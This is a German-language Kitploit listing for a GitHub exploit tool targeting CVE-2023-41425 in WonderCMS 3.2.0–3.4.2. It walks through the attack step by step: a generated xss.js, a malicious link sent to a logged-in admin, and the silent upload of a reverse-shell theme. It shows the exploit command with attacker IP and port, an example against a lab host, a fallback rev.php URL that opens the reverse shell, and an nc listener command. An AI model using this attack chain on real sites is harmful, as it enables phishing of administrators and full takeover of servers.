Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-41425-WonderCMS-Authenticated-RCE — XSS-Injection, WonderCMS 3.2.0 -3.4.2 | Kitploit
Tools/GitHubGitHub/diegomjx/cve-2023-41425-wondercms-authenticated-rce
Phishing-ToolsPayload-GenerierungExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRemote-Access-Tool
GitHubdiegomjx/cve-2023-41425-wondercms-authenticated-rce

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-41425-WonderCMS-Authenticated-RCE

XSS-Injection, WonderCMS 3.2.0 -3.4.2

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

CVE-2023-41425-WonderCMS-Authenticated-RCE

Beschreibung

WonderCMS v3.2.0 - v3.4.2 ist verwundbar. Angreifer können mithilfe eines Cross-Site-Scripting-Exploits (XSS) die volle Kontrolle über den Server übernehmen (Nur für Bildungszwecke). Hier ist der Plan:

So funktioniert es:

Der Exploit missbraucht die installModule-Komponente von WonderCMS, um ein manipuliertes Skript einzuschleusen, das beliebigen Code ausführt.

Das Setup

  • Tool: exploit.py
  • Was du brauchst:
    • Ziel-URL, auf der WonderCMS installiert ist (kein Admin-Passwort erforderlich).
    • Die IP-Adresse deines Angreifer-Rechners.
    • Einen Port für deinen Reverse-Shell-Listener.

Schritt-für-Schritt-Ausführung

  1. Das Skript erzeugt eine Datei namens xss.js. Diese JavaScript-Waffe ist darauf ausgelegt, reflektiertes XSS auszunutzen.
  2. Es gibt einen bösartigen Link aus. Diesen schickst du an den Admin.
  3. Der Trick greift, wenn der Admin (ein angemeldeter Benutzer) deinen Link öffnet oder anklickt:
  • Im Hintergrund werden ohne dessen Einwilligung Anfragen ausgelöst.
  • Über die Theme-/Plugin-Upload-Funktion wird ein Reverse-Shell-Payload hochgeladen.
  1. Sobald der Payload hochgeladen ist, wird er ausgeführt und gewährt dir eine Reverse-Shell-Verbindung direkt zum Zielserver.
root@kitploit:~
python3 exploit.py <URL> <YOUR_IP> <YOUR_PORT>

Beispiel

root@kitploit:~
python3 exploit.py http://sea.htb/loginURL 10.10.14.20 1234

Notfallplan:

Falls die Reverse Shell nicht automatisch ausgelöst wird, ruf einfach folgende Adresse auf:

root@kitploit:~
http://<TARGET_URL>/themes/revshell-main/rev.php?lhost=<YOUR_IP>&lport=<YOUR_PORT>

Hinweis:

Denk daran, einen Listener mit folgendem Befehl zu starten:

root@kitploit:~
nc -lvp 4444

Danksagung

prodigiousMind für das Entdecken und Melden der Schwachstelle https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413

Tool herunterladen